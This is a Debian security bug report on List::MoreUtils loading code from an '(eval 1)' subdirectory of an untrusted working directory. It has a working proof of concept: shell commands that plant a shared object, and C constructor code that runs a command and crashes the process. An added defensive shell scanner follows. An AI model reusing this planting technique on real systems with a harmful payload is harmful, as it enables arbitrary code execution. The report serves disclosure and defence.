Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things

List::MoreUtils tries to load code from a subdirectory of the current working directory. This could lead to execution of arbitrary code if cwd is untrusted.

Proof of concept:

$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
                (__)
                (oo)
          /------\/
         / |    ||
        *  /\---/\
           ~~   ~~
..."Have you mooed today?"...
Segmentation fault


-- System Information:
Debian Release: stretch/sid
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages liblist-moreutils-perl depends on:
ii  libc6                       2.22-13
ii  libexporter-tiny-perl       0.042-1
ii  perl                        5.22.2-1
ii  perl-base [perlapi-5.22.1]  5.22.2-1

--
Jakub Wilk
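#include <signal.h>
#include <stdlib.h>
/* The constructor attribute makes moo() run as soon as the shared object is loaded. */
void __attribute__((constructor)) moo(void) {
	/* Harmless visible marker that the code ran */
	system("apt-get moo");
	/* Send SIGSEGV to the whole process group (pid 0) */
	kill(0, SIGSEGV);
}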
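
Added example (not part of the original report): a shell check a defender can run on a working directory before invoking Perl there, flagging shared objects laid out like the one in the proof of concept above. The function name `scan_eval_auto` and the generalisation from `(eval 1)` to any `(eval N)` are assumptions.

```shell
#!/bin/sh
# Added example, not code from the bug report.
# Flags loadable objects placed in the layout the proof of concept uses:
#   <dir>/(eval N)/auto/<Module/Path>/<Name>.so
# Assumption: any eval number N is treated as suspicious, not only 1.
#
# Usage: scan_eval_auto /path/to/workdir || echo "do not run perl here"

# scan_eval_auto [DIR]
# Prints one line per matching file.
# Returns 0 if DIR is clean, 1 if at least one match was found.
scan_eval_auto() {
    dir=${1:-.}
    # Match regular files and symlinks: a symlink to a shared object
    # elsewhere would be loaded just the same.
    hits=$(find "$dir" \( -type f -o -type l \) -name '*.so' \
               -path '*/(eval [0-9]*)/auto/*' -print 2>/dev/null)
    if [ -z "$hits" ]; then
        return 0
    fi
    # Paths contain a space ("(eval 1)"), so keep the list quoted and
    # prefix each line rather than word-splitting it.
    printf '%s\n' "$hits" | sed 's/^/suspicious loadable object: /'
    return 1
}
```

A legitimate `auto/` tree that is not under a `(eval N)` directory is not reported.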
